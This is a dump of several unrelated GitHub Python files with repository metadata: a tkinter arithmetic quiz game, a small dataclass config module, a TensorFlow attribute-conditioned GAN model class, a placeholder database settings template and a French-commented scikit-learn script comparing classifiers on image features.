304611ed667d0e0ce01d8bb668ed44a8c1383183 | 45b58142f951659ff87b004add7aafc012cf374a | /ormiston_computing .py | 5af5c119259455458474e6047e1c59baab8c5c13 | [] | no_license | ashlynraj26/Ormiston_Computing | a913b8f97d8d4ff5997917f664a63535707cc931 | 6912f2fbf6f93077f05aa66619f5010d5a11c521 | refs/heads/main | 2023-09-04T13:17:55.671175 | 2021-11-14T23:38:01 | 2021-11-14T23:38:01 | 388,323,777 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,323 | py | from tkinter import *
import random
root = Tk()
root.geometry('700x400')
root.title('Ormiston Computing') #CORRECT ONE
score = 0
count = 0
class interface:
###################################################### First frame where user enters their name #########################################
def __init__(self):
self.f1=Frame(bg="#7CFC00")
self.f1.place(x=0,y=0,width=700,height=400)
self.label1=Label(self.f1, text="ENTER YOUR NAME", font = "Helvetica 60 bold", bg="#7CFC00")
self.label1.place(y=70, x=50)
self.usersname=Entry(self.f1, font = "Helvetica 40 bold")
self.usersname.place(y=170,x=190, height=75, width=300)
self.b1=Button(self.f1, text="NEXT", width= 10, height=2, command=self.checkentry)
self.b1.place(y=300, x=480)
self.Font_Tuple1 = ("helvetica", 20, "bold")
self.b1.configure(font= self.Font_Tuple1)
#validates and checks for user input
def checkentry(self):
self.usersname_text = self.usersname.get()
if self.usersname_text =="":
self.errormsg=Label(self.f1, text="Name required", font = "Helvetica 15 bold", fg="red", bg="#7CFC00")
self.errormsg.place(y=260, x=280)
else:
self.difficultypage()
###################################################### Button command to difficulty selection page:######################################
def difficultypage(self):
self.f2=Frame(bg="#8A2BE2")
self.f2.place(x=0,y=0,width=700,height=400)
#widgets
self.label2=Label(self.f2, text="SELECT LEVEL:", font = "Helvetica 60 bold", bg="#8A2BE2")
self.label2.place(y=50, x=100)
self.b2=Button(self.f2, text="EASY", width=14, height=7, highlightbackground="yellow", command=self.easyqpage)
self.b2.place(y=160, x=30)
self.Font_Tuple2 = ("helvetica", 20, "bold")
self.b2.configure(font= self.Font_Tuple2)
self.b3=Button(self.f2,text="MEDIUM", width=14, height=7, highlightbackground="orange", command=self.mediumqpage)
self.b3.place(x=260, y=160)
self.Font_Tuple3 = ("helvetica", 20, "bold")
self.b3.configure(font= self.Font_Tuple3)
self.b4=Button(self.f2,text="HARD", width=14, height=7, highlightbackground="red", command=self.hardqpage)
self.b4.place(x=490, y=160)
self.Font_Tuple4 = ("helvetica", 20, "bold")
self.b4.configure(font= self.Font_Tuple4)
#Lists for difficulty levels
self.easyq = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
self.medq = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
self.hardq = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
################################################################# Easy questions page: ##########################################################################
def easyqpage(self):
self.f3=Frame(bg="#E0FFFF")
self.f3.place(x=0,y=0,width=700, height=400)
#widgets
self.start = Button(self.f3, text="Start", width=16, height=4, command=self.nextq_easy)
self.start.place(x=200, y=95)
self.Font_Tuple6 = ("helvetica", 14, "bold")
self.start.configure(font= self.Font_Tuple6)
self.solving = Entry(self.f3, width=7, font = "Helvetica 40 bold")
self.solving.place(y=90,x=370, height=75, width=100)
self.submit = Button(self.f3, text="Submit Answer", width=16, height=4, command=lambda: self.submt1(self.solving))
self.submit.place(x=280, y=220)
self.Font_Tuple5 = ("helvetica", 14, "bold")
self.submit.configure(font= self.Font_Tuple5)
self.nextq_easy = Button(self.f3, text="Next", width=12, height=3, command=self.nextq_easy)
self.nextq_easy.place(x=290, y=300)
self.Font_Tuple5 = ("helvetica", 16, "bold")
self.nextq_easy.configure(font= self.Font_Tuple5)
#solving Entry (solving =Entry(f3)) for the easy questions
def submt1(self, solving):
global score, count
if self.solving.get() == str(self.resulteasyq()):
self.correct = Label(text="CORRECT", fg="green", font=("helvetica", 38), bg="#E0FFFF")
self.correct.place(x=470, y=120)
self.submit.config(state=DISABLED)
self.solving.config(state=DISABLED)
self.nextq_easy.config(state=NORMAL)
score = score+1
count = count+1
else:
self.wrong = Label(text="WRONG", fg="red", font=("helvetica", 38), bg="#E0FFFF")
self.wrong.place(x=470, y=120)
self.submit.config(state=DISABLED)
self.solving.config(state=DISABLED)
self.nextq_easy.config(state=NORMAL)
count = count+1
#Scoreboard is displayed after 10 questions
if count == 11:
self.scoreboard()
else:
pass
### NEXT CLASS Displays the math question by selecting two random values from the "num" list CLASS
def nextq_easy(self):
self.start.destroy()
self.nextq_easy.config(state=DISABLED)
self.submit.config(state=NORMAL)
self.solving.config(state=NORMAL)
self.solving.delete(0,'end')
self.cover = Label(text=" ", fg="green", font=("helvetica", 40), bg="#E0FFFF")
self.cover.place(x=470, y=120)
self.nextq_easy.easyq1update = random.choice(self.easyq)
self.nextq_easy.easyq2update = random.choice(self.easyq)
self.question = Label(text=f"{self.nextq_easy.easyq1update}+{self.nextq_easy.easyq2update}=", font = "Helvetica 70 bold",bg="#E0FFFF")
self.question.place(y=80, x=160)
#This displays to the user if they got the answer right or wrong ADD THIS TO A CLASS W A DEF FUNC FOR MED AND HARD
def resulteasyq(self):
self.question.destroy()
self.nextq_easy
return self.nextq_easy.easyq1update + self.nextq_easy.easyq2update
############################################################################## SCOREBOARD ###################################################################################
def write(self):
self.studentscoring = open('results.txt', 'a')
self.studentscoring.write(str(self.usersname_text) + " ")
self.studentscoring.write(str(score) + "/11" + "\n")
self.studentscoring.close()
def scoreboard(self):
self.f4=Frame(bg="#FFFF00")
self.f4.place(x=0,y=0,width=700,height=400)
#score displayed on scoreboard
self.playername=Label(self.f4, text=f"{score}/11", font="Helvetica 100 bold", bg="#FFFF00")
self.playername.place(x=240, y=140)
self.newp = Button(self.f4, text="New Player", width=16, height=3, command=lambda: [interface(), self.write()])
#button = Button(root, text="test", command=lambda:[funct1(),funct2()])
self.newp.place(y=300, x=500)
self.Font_Tuple7 = ("helvetica", 16, "bold")
self.newp.configure(font= self.Font_Tuple7)
self.home = Button(self.f4, text="HOME", width=16, height=3, command=lambda: [self.difficultypage(), self.write()])#command=self.difficultypage
self.home.place(y=300, x=50)
self.Font_Tuple8 = ("helvetica", 16, "bold")
self.home.configure(font= self.Font_Tuple8)
########################################################################## Medium questions page ##########################################################################
def mediumqpage(self):
self.f3=Frame(bg="#E0FFFF")
self.f3.place(x=0,y=0,width=700, height=400)
#widgets
self.start = Button(self.f3, text="Start", width=16, height=4, command=self.nextq_med)
self.start.place(x=200, y=95)
self.Font_Tuple6 = ("helvetica", 14, "bold")
self.start.configure(font= self.Font_Tuple6)
self.solving = Entry(self.f3, width=7, font = "Helvetica 40 bold")
self.solving.place(y=90,x=370, height=75, width=100)
self.submit = Button(self.f3, text="Submit Answer", width=16, height=4, command=lambda: self.submt2(self.solving))
self.submit.place(x=280, y=220)
self.Font_Tuple5 = ("helvetica", 14, "bold")
self.submit.configure(font= self.Font_Tuple5)
self.nextq_med = Button(self.f3, text="Next", width=12, height=3, command=self.nextq_med)
self.nextq_med.place(x=290, y=300)
self.Font_Tuple5 = ("helvetica", 16, "bold")
self.nextq_med.configure(font= self.Font_Tuple5)
#solving Entry (solving =Entry(f3)) for the easy questions
def submt2(self, solving):
global score, count
if self.solving.get() == str(self.resultmedq()):
self.correct = Label(text="CORRECT", fg="green", font=("helvetica", 38), bg="#E0FFFF")
self.correct.place(x=470, y=120)
self.submit.config(state=DISABLED)
self.solving.config(state=DISABLED)
self.nextq_med.config(state=NORMAL)
score = score+1
count = count+1
else:
self.wrong = Label(text="WRONG", fg="red", font=("helvetica", 38), bg="#E0FFFF")
self.wrong.place(x=470, y=120)
self.submit.config(state=DISABLED)
self.solving.config(state=DISABLED)
self.nextq_med.config(state=NORMAL)
count = count+1
#Scoreboard is displayed after 10 questions
if count == 11:
self.scoreboard()
else:
pass
#Displays the math question by selecting two random values from the "num" list CLASS
def nextq_med(self):
self.start.destroy()
self.nextq_med.config(state=DISABLED)
self.submit.config(state=NORMAL)
self.solving.config(state=NORMAL)
self.solving.delete(0,'end')
self.cover = Label(text=" ", fg="green", font=("helvetica", 40), bg="#E0FFFF")
self.cover.place(x=470, y=120)
self.nextq_med.medq1update = random.choice(self.medq)
self.nextq_med.medq2update = random.choice(self.medq)
self.question = Label(text=f"{self.nextq_med.medq1update}-{self.nextq_med.medq2update}=", font = "Helvetica 70 bold",bg="#E0FFFF")
self.question.place(y=80, x=160)
#This displays to the user if they got the answer right or wrong ADD THIS TO A CLASS W A DEF FUNC FOR MED AND HARD
def resultmedq(self):
self.question.destroy()
self.nextq_med
return self.nextq_med.medq1update - self.nextq_med.medq2update
########################################################################## Hard questions page ##########################################################################
def hardqpage(self):
self.f3=Frame(bg="#E0FFFF")
self.f3.place(x=0,y=0,width=700, height=400)
#widgets
self.start = Button(self.f3, text="Start", width=16, height=4, command=self.nextq_hard)
self.start.place(x=200, y=95)
self.Font_Tuple6 = ("helvetica", 14, "bold")
self.start.configure(font= self.Font_Tuple6)
self.solving = Entry(self.f3, width=7, font = "Helvetica 40 bold")
self.solving.place(y=90,x=370, height=75, width=100)
self.submit = Button(self.f3, text="Submit Answer", width=16, height=4, command=lambda: self.submt(self.solving))
self.submit.place(x=280, y=220)
self.Font_Tuple5 = ("helvetica", 14, "bold")
self.submit.configure(font= self.Font_Tuple5)
self.nextq_hard = Button(self.f3, text="Next", width=12, height=3, command=self.nextq_hard)
self.nextq_hard.place(x=290, y=300)
self.Font_Tuple5 = ("helvetica", 16, "bold")
self.nextq_hard.configure(font= self.Font_Tuple5)
#solving Entry (solving =Entry(f3)) for the easy questions
def submt(self, solving):
global score, count
if self.solving.get() == str(self.resulthardq()):
self.correct = Label(text="CORRECT", fg="green", font=("helvetica", 38), bg="#E0FFFF")
self.correct.place(x=470, y=120)
self.submit.config(state=DISABLED)
self.solving.config(state=DISABLED)
self.nextq_hard.config(state=NORMAL)
score = score+1
count = count+1
else:
self.wrong = Label(text="WRONG", fg="red", font=("helvetica", 38), bg="#E0FFFF")
self.wrong.place(x=470, y=120)
self.submit.config(state=DISABLED)
self.solving.config(state=DISABLED)
self.nextq_hard.config(state=NORMAL)
count = count+1
#Scoreboard is displayed after 10 questions
if count == 11:
self.scoreboard()
else:
pass
#Displays the math question by selecting two random values from the "num" list CLASS
def nextq_hard(self):
self.start.destroy()
self.nextq_hard.config(state=DISABLED)
self.submit.config(state=NORMAL)
self.solving.config(state=NORMAL)
self.solving.delete(0,'end')
self.cover = Label(text=" ", fg="green", font=("helvetica", 40), bg="#E0FFFF")
self.cover.place(x=470, y=120)
self.nextq_hard.hardq1update = random.choice(self.hardq)
self.nextq_hard.hardq2update = random.choice(self.hardq)
self.question = Label(text=f"{self.nextq_hard.hardq1update}×{self.nextq_hard.hardq2update}=", font = "Helvetica 70 bold",bg="#E0FFFF")
self.question.place(y=80, x=160)
#This displays to the user if they got the answer right or wrong ADD THIS TO A CLASS W A DEF FUNC FOR MED AND HARD
def resulthardq(self):
self.question.destroy()
self.nextq_hard
return self.nextq_hard.hardq1update * self.nextq_hard.hardq2update
interface()
root.resizable(False,False)
root.mainloop()
| [
"noreply@github.com"
] | ashlynraj26.noreply@github.com |
b201ed102dbba5b1f3a1d5d8a49ed4c72aa5e772 | 54051a303f9c492075f7351efc3c67484aef9919 | /modad/config.py | eda1d973cfec4f2733516f6a6b0b7f4b0616e2cb | [] | no_license | jessielaf/modad | ee6048bb6a66e00b827651d72d34388d3b238475 | 4f03f0e46a8f85b1475653e206fba48569e05a83 | refs/heads/master | 2021-06-21T09:20:03.826747 | 2019-08-22T14:21:13 | 2019-08-22T14:21:13 | 200,662,089 | 0 | 0 | null | 2021-03-25T22:50:41 | 2019-08-05T13:35:54 | Python | UTF-8 | Python | false | false | 795 | py | from typing import Union, List
from dataclasses import dataclass
@dataclass
class Destination:
"""
Destination when using multiple destinations
Args:
src (str): The source of the destination inside the module
dest: (str): The destination of the module inside the project
"""
src: str
dest: str
@dataclass
class Module:
"""
Args:
name (str): The name of the module
repo (str): Repository where the module is located
version (str): Version of the repository that should be cloned. Defaults to `master`
"""
name: str
repo: str
version: str = "master"
class _Config:
"""
The config of modad
"""
dest: Union[str, List[Destination]]
modules: List[Module] = []
config = _Config()
| [
"jessielaff@live.nl"
] | jessielaff@live.nl |
da38ce5115caa556d48c8c4b93baac1b3dd57215 | 709d07aaa5af1f3f3728b33ca471f6237e4c8306 | /aacnn.py | 4976b0e928f2528240a4dd998d0f3c824e4b4f61 | [] | no_license | ankushjain01/AACNN-master | 362ac3d21357d88e7287a5fa59f556bdf7628def | 0fe6b85d022852a9fdc1995c21bdf3137f74fb1d | refs/heads/master | 2020-09-28T07:09:29.448814 | 2019-12-08T19:40:25 | 2019-12-08T19:40:25 | 226,720,137 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,396 | py | import os
import tensorflow as tf
from generator import Generator
from discriminator import Discriminator
class AACNN():
"""AACNN model.
"""
def __init__(self, sess, FLAGS):
"""Initialization.
Args:
sess: TensorFlow session
FLAGS: flags object
"""
# initialize variables
self.sess = sess
self.f = FLAGS
self.l2_weight = FLAGS.l2_weight
self.global_step_g = tf.Variable(0, trainable=False)
self.global_step_d = tf.Variable(0, trainable=False)
# inputs: real (training) images
images_shape = [self.f.output_size_height, self.f.output_size_wight, self.f.c_dim]
attributes_shape = [self.f.attribute_size]
# self.real_images = tf.placeholder(tf.float32, [None] + images_shape, name="real_images")
# inputs: HR images
self.input = tf.placeholder(tf.float32, [self.f.batch_size] + images_shape, name="input")
self.input_attribute = tf.placeholder(tf.float32, [self.f.batch_size] + attributes_shape, name="input_attribute")
# initialize models
generator = Generator(FLAGS)
discriminator = Discriminator(FLAGS)
# generator network
self.G = generator(self.input, self.input_attribute)
if self.f.with_gan:
# discriminator network for real images
self.D_real, self.D_real_logits = discriminator(self.input)
# discriminator network for fake images
self.D_fake, self.D_fake_logits = discriminator(self.G, reuse=True)
# losses
self.d_loss_real = tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(
logits=self.D_real_logits,
labels=tf.ones_like(self.D_real))
)
self.d_loss_fake = tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(
logits=self.D_fake_logits,
labels=tf.zeros_like(self.D_fake))
)
self.d_loss = self.d_loss_real + self.d_loss_fake
self.g_loss_adv = tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(
logits=self.D_fake_logits,
labels=tf.ones_like(self.D_fake))
)
else:
self.l2_weight = 1
self.g_loss_l2 = tf.losses.mean_squared_error(
self.input,
self.G,
weights=self.l2_weight,
scope=None
)
if self.f.with_gan:
self.g_loss = self.g_loss_l2 + self.g_loss_adv
else:
self.g_loss = self.g_loss_l2
# create summaries
self.__create_summaries()
# organize variables
t_vars = tf.trainable_variables()
if self.f.with_gan:
self.d_vars = [var for var in t_vars if "d/" in var.name]
self.g_vars = [var for var in t_vars if "g/" in var.name]
#print self.g_vars
# saver
self.saver = tf.train.Saver()
def save(self, step):
"""Save model.
Postconditions:
checkpoint directory is created if not found
checkpoint directory is updated with new saved model
Args:
step: step of training to save
"""
model_name = "AACNN.model"
model_dir = self.get_model_dir()
checkpoint_dir = os.path.join(self.f.checkpoint_dir, model_dir)
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
model_file_prefix = model_dir
self.saver.save(self.sess,
os.path.join(checkpoint_dir, model_file_prefix),
global_step=step)
def checkpoint_exists(self):
"""Check if any checkpoints exist.
Returns:
True if any checkpoints exist
"""
model_dir = self.get_model_dir()
checkpoint_dir = os.path.join(self.f.checkpoint_dir, model_dir)
return os.path.exists(checkpoint_dir)
def load(self):
"""Load model.
Returns:
True if model is loaded successfully
"""
model_dir = self.get_model_dir()
checkpoint_dir = os.path.join(self.f.checkpoint_dir, model_dir)
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if ckpt and ckpt.model_checkpoint_path:
# load model
ckpt_name = os.path.basename(ckpt.model_checkpoint_path)
self.saver.restore(self.sess,
os.path.join(checkpoint_dir, ckpt_name))
return True
else:
return False
def get_model_dir(self):
"""Helper function to get the model directory.
Returns:
string of model directory
"""
return "{0}_{1}_{2}_{3}_{4}".format(self.f.experiment_name,
self.f.dataset,
self.f.batch_size,
self.f.output_size_wight,
self.f.output_size_height)
def __create_summaries(self):
"""Helper function to create summaries.
"""
# image summaries
self.g_sum = tf.summary.image("generated",
self.G,
max_outputs=8)
self.real_sum = tf.summary.image("real",
self.input,
max_outputs=8)
if self.f.with_gan:
# histogram summaries
self.d_real_sum = tf.summary.histogram("d/output/real", self.D_real)
self.d_fake_sum = tf.summary.histogram("d/output/fake", self.D_fake)
# scalar summaries
self.d_loss_real_sum = tf.summary.scalar("d/loss/real",
self.d_loss_real)
self.d_loss_fake_sum = tf.summary.scalar("d/loss/fake",
self.d_loss_fake)
self.d_loss_sum = tf.summary.scalar("d/loss/combined",
self.d_loss)
self.g_loss_sum = tf.summary.scalar("g/loss/combined",
self.g_loss)
| [
"noreply@github.com"
] | ankushjain01.noreply@github.com |
a17fa25a10e0649ff9326dc7dc05bcb5e574619b | e02e463ca47e8d5fce6b60040333afad875558fc | /config_sample.py | 5d4e9f564f8e3322a727814b45bf7a52b0de7eb0 | [] | no_license | akarimyar/Infra_Automation | 0d7c4db2868a27596132f6d653050513ec49bc7e | f29920571fad93bae7802df7837c8c2387bb15de | refs/heads/master | 2020-07-24T10:36:21.070233 | 2019-09-23T16:18:37 | 2019-09-23T16:18:37 | 207,896,253 | 1 | 1 | null | 2019-09-23T16:18:38 | 2019-09-11T20:00:51 | Python | UTF-8 | Python | false | false | 168 | py | db_connection_settings = {
'user': '<username>',
'password': '<password>',
'host': '<localhost>',
'database': '<db_name>',
'port': '<port_number>'
} | [
"sjogdeo@mercycorps.org"
] | sjogdeo@mercycorps.org |
4dfb9fa5aa37bfc7fc199c580f57e36c5f93bf39 | f75a82be973ab175459bf7571c38ab362a65dd88 | /30_Python/classification/VT_20141030_EvryOriginales_entropie.py | 45435d3c9daa17a407f0ce8d08bc1ded2273430f | [] | no_license | nabil67/Bio_Python | fe7c5869533883d23762110861ce110dbd7e6dee | 61e34604a0345b4542a6876f6cabd372cec08f8d | refs/heads/master | 2020-05-03T23:05:31.238528 | 2019-04-10T09:39:27 | 2019-04-10T09:39:27 | 178,857,186 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,539 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Apr 18 10:39:01 2016
@author: nabil.belahrach
# -*- coding: utf-8 -*-
Éditeur de Spyder
Ceci est un script temporaire.
"""
import numpy as np
import pandas as pd
import matplotlib.pylab as plt
from sklearn.cross_validation import train_test_split
from sklearn import preprocessing
from sklearn.neighbors import KNeighborsClassifier
from sklearn.grid_search import GridSearchCV
#from mpl_toolkits.mplot3d import Axes3D
from sklearn import svm
from sklearn.metrics import classification_report
#from sklearn.decomposition import PCA
#import statsmodels.api as sm
from sklearn import metrics
from sklearn import linear_model
from sklearn import cross_validation
from sklearn import ensemble
from sklearn import neighbors
from sklearn import tree
import seaborn as sns
plt.style.use('ggplot')
#plt.style.use('fivethirtyeight') # Good looking plots
#pd.set_option('display.max_columns', None)
from Mesfonctions import *
df = pd.read_csv("U:/Stagiaires/Nabil.BELAHRACH/Donnees/20_brut/VT_20141030_EvryOriginales_entropie.csv",
sep=";", header = False,usecols=[1,14,15,16,19,20,21,26],
names = ['classe','moyenne','ecart-type','mediane','entropie','uniformit','surface','eccentricity' ])
print df.head()
df.shape
#==============================================================================
"""---------------------------Préparation des données ------------------ """
#==============================================================================
df['moyenne']=df['moyenne'].str.replace("," , ".")
df['entropie']=df['entropie'].str.replace("," , ".")
df['eccentricity']=df['eccentricity'].str.replace("," , ".")
df['uniformit']=df['uniformit'].str.replace("," , ".")
df['ecart-type']=df['ecart-type'].str.replace("," , ".")
df["classe"] =pd.Categorical(df["classe"])
cl = pd.CategoricalIndex(df["classe"]).categories
df[['moyenne','ecart-type','mediane','surface','entropie','uniformit','eccentricity']] = df[['moyenne','ecart-type',
'mediane','surface','entropie','uniformit','eccentricity']].astype(float)
df["classe"] = df["classe"].cat.rename_categories(["c2","c3","c6","c4","c5","c1"])
df["classe"] = df.classe.cat.reorder_categories(["c1","c2","c3","c4","c5","c6"])
#df2 = df[['classe', 'uniformit','surface','eccentricity']]
#df.to_csv('U:/Stagiaires/Nabil.BELAHRACH/Donnees/20_brut/myFile_entropie.csv', sep = ';')
#==============================================================================
"""---------------------- X, y -------------------------------------------- """
#==============================================================================
X = (df[:][['moyenne','ecart-type','mediane','surface','entropie','uniformit','eccentricity']]).values
#X = (df[:][['surface','uniformit','eccentricity']]).values
Y = (df[:][['classe']]).values
y= Y.ravel()
#df.classe.value_counts()
scaler= preprocessing.StandardScaler().fit(X)
X = scaler.transform(X)
#==============================================================================
""" ------------------------ Classification KNN --------------------------- """
#==============================================================================
""" ------center et réduire les variables explicatives ! -----------"""
#polynomial_features = preprocessing.PolynomialFeatures()
#X = polynomial_features.fit_transform(X)
X_train,X_test,Y_train,Y_test = train_test_split( X, y,
test_size= 0.25,random_state=33)
# entrainement
param = [{"n_neighbors": list(range(1,15))}]
knn = GridSearchCV(KNeighborsClassifier(), param, cv=10, n_jobs= -1)
digit_knn = knn.fit(X_train, Y_train)
print ("le best param = "), digit_knn.best_params_["n_neighbors"]
pass # best param = 9
""" ------on relance le modèle avec le best-paramètre -----------"""
knn = KNeighborsClassifier(n_neighbors= digit_knn.best_params_["n_neighbors"])
digit_knn.score(X_train,Y_train) # estimation de l'erreur = 55%
Y_pred = digit_knn.predict(X_test) # prediction des réponses de X_test
table = pd.crosstab( Y_test, Y_pred) # matrice de confusion
print table;
print classification_report( Y_test, Y_pred)
def Acccuracy3diag(table):
mat = table.values
bc = 0
for i in [-1,0,1]:
diag= np.trace(mat,offset= i )
bc += diag
total = sum(sum(mat[:,:]))
prc = float(bc)/total
return prc
Acccuracy3diag(table)
plt.matshow(table)
plt.title("Matrice de Confusion du knn 3c") # pas top
plt.colorbar()
plt.show()
#==============================================================================
"""------------ cross_validation.StratifiedKFold -------------- """
#==============================================================================
def stratified_cv(X, Y, clf_class, shuffle=True, n_folds=10, **kwargs):
stratified_k_fold = cross_validation.StratifiedKFold(Y, n_folds=n_folds, shuffle=shuffle)
Y_pred = Y.copy()
for ii, jj in stratified_k_fold:
X_train, X_test = X[ii], X[jj]
Y_train = Y[ii]
clf = clf_class(**kwargs)
clf.fit(X_train,Y_train)
Y_pred[jj] = clf.predict(X_test)
return Y_pred
"""------------------ accuracy --------------------------------------------- """
print('Passive Aggressive Classifier: {:.2f}'.format(metrics.accuracy_score(y, stratified_cv(X, y, linear_model.PassiveAggressiveClassifier))))
print('Gradient Boosting Classifier: {:.2f}'.format(metrics.accuracy_score(y, stratified_cv(X, y, ensemble.GradientBoostingClassifier))))
print('Support vector machine(SVM): {:.2f}'.format(metrics.accuracy_score(y, stratified_cv(X, y, svm.SVC))))
print('Random Forest Classifier: {:.2f}'.format(metrics.accuracy_score(y, stratified_cv(X, y, ensemble.RandomForestClassifier))))
print('K Nearest Neighbor Classifier: {:.2f}'.format(metrics.accuracy_score(y, stratified_cv(X, y, neighbors.KNeighborsClassifier))))
print('Logistic Regression: {:.2f}'.format(metrics.accuracy_score(y, stratified_cv(X, y, linear_model.LogisticRegression))))
"""--------------- precision, recall, f1-score -------------- """
print('Passive Aggressive Classifier:\n {}\n'.format(metrics.classification_report(y, stratified_cv(X, y, linear_model.PassiveAggressiveClassifier))));
print('Gradient Boosting Classifier:\n {}\n'.format(metrics.classification_report(y, stratified_cv(X, y, ensemble.GradientBoostingClassifier))));
print('Support vector machine(SVM):\n {}\n'.format(metrics.classification_report(y, stratified_cv(X, y, svm.SVC))));
print('Random Forest Classifier:\n {}\n'.format(metrics.classification_report(y, stratified_cv(X, y, ensemble.RandomForestClassifier))));
print('K Nearest Neighbor Classifier:\n {}\n'.format(metrics.classification_report(y, stratified_cv(X, y, neighbors.KNeighborsClassifier))));
print('Logistic Regression:\n {}\n'.format(metrics.classification_report(y, stratified_cv(X, y, linear_model.LogisticRegression))));
#print('Dump Classifier:\n {}\n'.format(metrics.classification_report(y, [0 for ii in y.tolist()]))); # ignore the warning as they are all 0
pass
#==============================================================================
"""----------------------- features importances ------------------------- """
#==============================================================================
"""--------------- selection de variables Grad_Bossiting -------------- """
gbc = ensemble.GradientBoostingClassifier()
gbc.fit(X, y)
# Get Feature Importance from the classifier
feature_importance = gbc.feature_importances_
# Normalize The Features
feature_importance = 100.0 * (feature_importance / feature_importance.max())
sorted_idx = np.argsort(feature_importance)
pos = np.arange(sorted_idx.shape[0]) + .5
plt.figure(figsize=(16, 12))
plt.barh(pos, feature_importance[sorted_idx], align='center', color='#7A68A6')
plt.yticks(pos, np.asanyarray(df.columns[1:].tolist())[sorted_idx])
plt.xlabel('Relative Importance')
plt.title('Variable Importance')
plt.savefig('Relative_Importance_GBoosting_5c.png')
plt.show()
"""--------------- selection de variables adaboost -------------- """
gbc = ensemble.AdaBoostClassifier()
gbc.fit(X, y)
# Get Feature Importance from the classifier
feature_importance = gbc.feature_importances_
# Normalize The Features
feature_importance = 100.0 * (feature_importance / feature_importance.max())
sorted_idx = np.argsort(feature_importance)
pos = np.arange(sorted_idx.shape[0]) + .5
plt.figure(figsize=(16, 12))
plt.barh(pos, feature_importance[sorted_idx], align='center', color='#7A68A6')
plt.yticks(pos, np.asanyarray(df.columns[1:].tolist())[sorted_idx])
plt.xlabel('Relative Importance')
plt.title('Variable Importance')
plt.savefig('Relative_Importance_AdaBoost_5c.png')
plt.show()
"""--------------- selection de variables adaboost -------------- """
gbc = ensemble.RandomForestClassifier()
gbc.fit(X, y)
# Get Feature Importance from the classifier
feature_importance = gbc.feature_importances_
# Normalize The Features
feature_importance = 100.0 * (feature_importance / feature_importance.max())
sorted_idx = np.argsort(feature_importance)
pos = np.arange(sorted_idx.shape[0]) + .5
plt.figure(figsize=(16, 12))
plt.barh(pos, feature_importance[sorted_idx], align='center', color='#7A68A6')
plt.yticks(pos, np.asanyarray(df.columns[1:].tolist())[sorted_idx])
plt.xlabel('Relative Importance')
plt.title('Variable Importance')
plt.savefig('Relative_Importance_RandomForestClassifier.png')
plt.show()
#==============================================================================
"""---------------------matrix de confusion-------------------------------- """
#==============================================================================
pass_agg_conf_matrix = metrics.confusion_matrix(y, stratified_cv(X, y, linear_model.PassiveAggressiveClassifier))
grad_ens_conf_matrix = metrics.confusion_matrix(y, stratified_cv(X, y, ensemble.GradientBoostingClassifier))
decision_conf_matrix = metrics.confusion_matrix(y, stratified_cv(X, y, tree.DecisionTreeClassifier))
ridge_clf_conf_matrix = metrics.confusion_matrix(y, stratified_cv(X, y, linear_model.RidgeClassifier))
svm_svc_conf_matrix = metrics.confusion_matrix(y, stratified_cv(X, y, svm.SVC))
random_forest_conf_matrix = metrics.confusion_matrix(y, stratified_cv(X, y, ensemble.RandomForestClassifier))
k_neighbors_conf_matrix = metrics.confusion_matrix(y, stratified_cv(X, y, neighbors.KNeighborsClassifier))
logistic_reg_conf_matrix = metrics.confusion_matrix(y, stratified_cv(X, y, linear_model.LogisticRegression))
#dumb_conf_matrix = metrics.confusion_matrix(y, [0 for ii in y.tolist()]); # ignore the warning as they are all 0
conf_matrix = {
1: {
'matrix': pass_agg_conf_matrix,
'title': 'Passive Aggressive',
},
2: {
'matrix': grad_ens_conf_matrix,
'title': 'Gradient Boosting',
},
3: {
'matrix': decision_conf_matrix,
'title': 'Decision Tree',
},
4: {
'matrix': ridge_clf_conf_matrix,
'title': 'Ridge',
},
5: {
'matrix': svm_svc_conf_matrix,
'title': 'Support Vector Machine',
},
6: {
'matrix': random_forest_conf_matrix,
'title': 'Random Forest',
},
7: {
'matrix': k_neighbors_conf_matrix,
'title': 'K Nearest Neighbors',
},
8: {
'matrix': logistic_reg_conf_matrix,
'title': 'Logistic Regression',
# }
# 9: {
# 'matrix': dumb_conf_matrix,
# 'title': 'Dumb',
},
}
fix, ax = plt.subplots(figsize=(16, 12))
plt.suptitle('Confusion Matrix of Various Classifiers')
for ii, values in conf_matrix.items():
matrix = values['matrix']
title = values['title']
plt.subplot(3, 3, ii) # starts from 1
plt.title(title);
sns.heatmap(matrix, annot=True, fmt='');
plt.savefig('Confusion_Matrix_VC_5c.png')
plt.show()
#==============================================================================
"""------------------------ c4 == c5 ----------------------------"""
#==============================================================================
g1=df[df.classe == "c1"]
g2=df[df.classe == "c2"]
g3=df[df.classe == "c3"]
g4=df[df.classe == "c4"]
g5=df[df.classe == "c5"]
g6=df[df.classe == "c6"]
try:
g1["classe5"]="c1"
g2["classe5"]="c2"
g3["classe5"]="c3"
g4["classe5"]="c4"
g5["classe5"]="c4"
g6["classe5"]="c6"
except:
pass
newData =pd.concat([g1,g2,g3,g4,g5,g6],axis=0,ignore_index=True)
X = (newData[:][['moyenne','ecart-type','mediane','surface','entropie','uniformit','eccentricity']]).values
Y = (newData[:][['classe5']]).values
y = Y.ravel()
scaler= preprocessing.StandardScaler().fit(X)
X = scaler.transform(X)
#==============================================================================
""" ----------------------- VotingClassifier--------------------------------"""
#==============================================================================
from sklearn.ensemble import VotingClassifier
clf1 = LogisticRegression(random_state=1)
clf2 = RandomForestClassifier(random_state=1)
clf3 = svm.SVC()
eclf = VotingClassifier(estimators=[('lr', clf1), ('rf', clf2), ('gnb', clf3)], voting='hard')
for clf, label in zip([clf1, clf2, clf3, eclf], ['Logistic Regression', 'Random Forest', 'SVM', 'Ensemble']):
scores = cross_validation.cross_val_score(clf, X, y, cv=10, scoring='accuracy')
print("Accuracy: %0.2f (+/- %0.2f) [%s]" % (scores.mean(), scores.std(), label))
sklearn.ensemble()
| [
"nabil.belahrach@gmail.com"
